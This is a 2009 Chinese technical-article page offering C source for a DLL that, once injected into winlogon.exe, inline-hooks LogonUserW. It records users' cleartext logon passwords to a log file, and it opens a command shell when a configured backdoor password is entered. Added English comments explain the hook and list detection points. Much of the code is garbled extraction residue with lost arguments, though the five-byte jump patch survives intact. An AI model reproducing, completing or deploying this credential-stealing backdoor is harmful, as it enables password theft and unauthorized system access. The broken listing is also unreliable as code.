GINA PassWord Sniffer(截取登陆密码)
栏目:技术文章 作者:东方标准 时间:2009-12-27 04:21:05
GINA PassWord Sniffer(截取登陆密码)
dll源码,编译后插入winlogon.exe进程即可记录登陆密码记录。
需要在相同目录保存一个ntuserlog.config的配置文件,如:
enable=1
cmdline=cmd.exe
password=Ghash
logfile=c:\windows\sysem32\userpwdlog.log
文件末尾的回车必不可少。若enable为1 则可以password获得一个shell。
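用了HOOK的技术,HOOK的是LogonUserW(advapi32.dll导出的API)。标题虽称GINA,但下面的代码并未替换或实现GINA DLL,而是在winlogon.exe进程内对LogonUserW的入口做内联挂钩(inline hook)。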
//VC-DLL
#include <windows.h>
#include <stdio.h>
#include <time.h>
// Module-wide state shared by DllMain and the MyLogonUserW hook.
// NOTE(review): the calls that fill and read most of these buffers were lost
// when the page was extracted (the bracketed residue in the function bodies),
// so the roles below are inferred from the names and from the config keys
// listed in the article text (enable / cmdline / password / logfile) - confirm.
int backdoor; // presumably the "enable" flag from the config file - confirm
char shell[1023],passwd[1023]; // presumably the "cmdline" and "password" config values - confirm
char logfile[1023]; // presumably the "logfile" path from the config file - confirm
FILE *fp; // assigned from fopen in both DllMain and the hook; which file each opens is not visible
char buf1[127],buf2[127]; // presumably the time/date strings for a log entry - confirm
char pwd[1023]; // purpose not visible in this listing
// Code address of LogonUserW plus 5, set in DllMain; the hook jumps to it.
// The address is held in an unsigned long and used from MSVC inline __asm,
// so the listing only makes sense as a 32-bit x86 build.
unsigned long LUW;
// Replacement entry point that DllMain patches in front of LogonUserW.
// It takes the same six parameters as LogonUserW, so every logon request made
// through that API in the hosting process passes through here first, including
// the cleartext lpszPassword.
//
// NOTE(review): every statement in the body except the __asm block is
// extraction residue - only the callee names survive, not their arguments.
// From the names alone the body appears to: build a time/date stamp, open a
// file, write to it, close it, format a string, and conditionally call
// WinExec. The article text says the purpose is to record logon passwords and,
// when enabled, to start the configured command on a matching password; that
// cannot be confirmed from the lines shown here.
//
// Detection points that follow from the visible names and the article text:
// file writes originating from winlogon.exe to a log path taken from
// ntuserlog.config, and a child process created by winlogon.exe via WinExec.
BOOL
WINAPI
MyLogonUserW (
LPWSTR lpszUsername,
LPWSTR lpszDomain,
LPWSTR lpszPassword,
DWORD dwLogonType,
DWORD dwLogonProvider,
PHANDLE phToken
){
// Residue of the time/date calls (arguments lost).
[标记错误:_tzset];
[标记错误:_strtime];
[标记错误:_strdate];
// Residue of a file open / write / close sequence (arguments lost).
fp=[标记错误:fopen];
[标记错误:fprintf];
[标记错误:fclose];
// Residue of a string format, a condition and a WinExec call (arguments lost).
[标记错误:sprintf];
[标记错误:if]
WinE[标记错误:xec];
// Hand control to the real API: restore three registers from the stack and
// jump to LUW (LogonUserW + 5, i.e. just past the five bytes DllMain
// overwrote). The function never returns through its own epilogue.
// NOTE(review): the three pops presumably undo register saves emitted by the
// compiler's prologue for this function - that depends on compiler and build
// settings and is not established by anything in this listing.
__asm{
pop edi
pop esi
pop ebx
jmp LUW
}
}
// Module handle saved on process attach; not read anywhere in this listing.
HINSTANCE hInstance;
// DLL entry point. Installs a 5-byte inline hook at the start of LogonUserW
// when the DLL is loaded into a process.
//
// Before looking at fdwReason (so on every notification, not only on process
// attach) it recomputes LUW = LogonUserW + 5 and runs a file open, four
// fscanf calls and a close. The arguments are extraction residue;
// NOTE(review): presumably this reads the four keys of ntuserlog.config
// described in the article text - confirm.
//
// On DLL_PROCESS_ATTACH it writes the byte 0xE9 (the x86 near-jump opcode)
// at LogonUserW, then a 4-byte displacement computed as
// MyLogonUserW - LogonUserW - 5 at the following address, so that calls to
// LogonUserW land in MyLogonUserW. The leading arguments of both
// WriteProcessMemory calls are residue and not visible.
//
// Detection points: the first five bytes of LogonUserW in the process no
// longer match the on-disk image of the exporting DLL and begin with 0xE9;
// an unexpected module is loaded in winlogon.exe; a file named
// ntuserlog.config sits next to that module (per the article text).
//
// Always returns TRUE; the results of the memory writes are not checked.
int WINAPI DllMain (HINSTANCE hInst, DWORD fdwReason, PVOID pvReserved)
{ unsigned char m;
unsigned long i,t,s;
// Resume address used by the hook: just past the bytes that get overwritten.
LUW=(unsigned long)LogonUserW;
LUW+=5;
// Residue of the config-file read (arguments lost).
fp=[标记错误:fopen];
[标记错误:fscanf];
[标记错误:fscanf];
[标记错误:fscanf];
[标记错误:fscanf];
[标记错误:fclose];
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
hInstance=hInst;
m=0xe9; // x86 opcode for JMP rel32
s=(unsigned long)LogonUserW; // patch target: first byte of the API
t=(unsigned long)MyLogonUserW-s-5; // displacement relative to the end of the 5-byte jump
// First write: the one-byte opcode at s (i receives the byte count).
WriteProcessM[标记错误:emory]s,&m,1,&i);
s++;
// Second write: the four-byte displacement at s + 1.
WriteProcessM[标记错误:emory]s,&t,4,&i);
break;
};
return TRUE;
}




